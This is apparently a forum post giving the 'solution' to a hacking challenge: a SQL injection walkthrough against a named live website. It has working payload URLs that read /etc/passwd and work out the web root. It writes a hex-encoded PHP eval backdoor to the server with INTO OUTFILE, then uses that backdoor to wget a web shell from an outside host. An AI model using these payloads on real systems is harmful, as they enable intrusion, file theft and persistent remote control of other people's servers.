AnonGuy's Challenge [#25] - Solution

1. So .. what's the first file you check when you see that user is root?
2. /etc/passwd. -- The answer is always /etc/passwd. :v
3.  
4. http://www.agiperwatch.ru/new.php?id=.' uNiOn SeLeCt 1,cOncat('<pre>',load_file('/etc/passwd'),'</pre>'),3,4,5,6-- --
5.  
6. Most of the people who tried the challenge found /var/www/agiperwatch/data and thought this is the full path and when they failed they stopped .. but if you tried reading the /etc/passwd carefully you would've noticed there's another path containing "agiperwatch"
7.  
8. virtuser_526:x:526:502::/var/www/agiperwatch/data/email/agiperwatch.ru/sale:/usr/sbin/nologin
9.  
10. /var/www/agiperwatch/data/email/agiperwatch.ru/sale .. that wasn't the right path too :v but
11. look at that folder after /data/ .. "/email/" - I assume it's for mail/smtp purposes .. if we change that to "www" as in "/var/www" we have our full path ..
12.  
13. /var/www/agiperwatch/data/www/agiperwatch.ru/ -- # You get errcode 13 if you try writing in this folder, it means permissión denied
14.  
15. so we just have to change /sale to /temp *writeable folder* and upload our shell .. the error-based part was easy .. the goal was to find the right path..
16.  
17. http://www.agiperwatch.ru/new.php?id=40' limit 1 into outfile '/var/www/agiperwatch/data/www/agiperwatch.ru/temp/xyz.php' lines terminated by 0x3c3f70687020406576616c28245f524551554553545b27616e306e275d29203f3e -- --
18. http://www.agiperwatch.ru/temp/xyz.php?an0n=system('wget http://site.com/shell.txt -O shell.php');
19. and there you have it..